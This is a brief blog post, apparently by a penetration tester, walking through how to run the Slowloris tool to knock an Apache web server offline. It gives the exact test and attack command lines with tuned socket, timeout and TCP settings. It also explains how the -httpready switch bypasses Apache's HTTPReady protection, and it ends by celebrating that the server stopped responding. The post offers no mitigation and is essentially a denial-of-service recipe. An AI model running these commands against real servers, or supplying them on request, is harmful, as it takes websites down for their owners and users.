A few days ago I posted about a tool I had just discovered called Slowloris. Well, I finally had a pentest providing the opportunity to actually use it!
Here is a brief walkthrough on how to use it (please follow my previous blog post for download links):
Step 1: Test for delay
perl slowloris.pl -dns [target] -port [webserver] -test
Step 2: Begin Attack
There are a bunch of options that you can use when you actually do your attack. Slowloris supports HTTPS (-https), HTTPReady bypass (-httpready), and more. There are some very detailed instructions in the perldocs ($ perldoc slowloris.pl). Here was my attack:
perl slowloris.pl -dns [target] -port 80 -timeout 500 -num 500 -tcpto 5 -httpready
- -dns : the target
- -port : the port the webserver is running on
- -timeout: this is the timeout delay for each thread. It will wait this long before reacquiring tcp space on the server. This value is discovered using the -test flag from step 1.
- -num : number of sockets to use to get connections. The documentation says most apache servers will require a value of 400-600. Some others may be as low as 300 depending on the configuration.
- -tcpto : TCP Timeout. In some cases your threads will have resource issues. Keeping this value as exact as possible (as well as the -num value) will improve performance. the default used during the test is 5; I have found that to be sufficient.
- -httpready: HTTPReady is used by apache to buffer connections. You can bypass this protection by sending POST requests instead of GET or HEAD. That is exactly what this switch does.
After a tiny little wait, the web server wouldn’t respond to HTTP requests. Beautiful!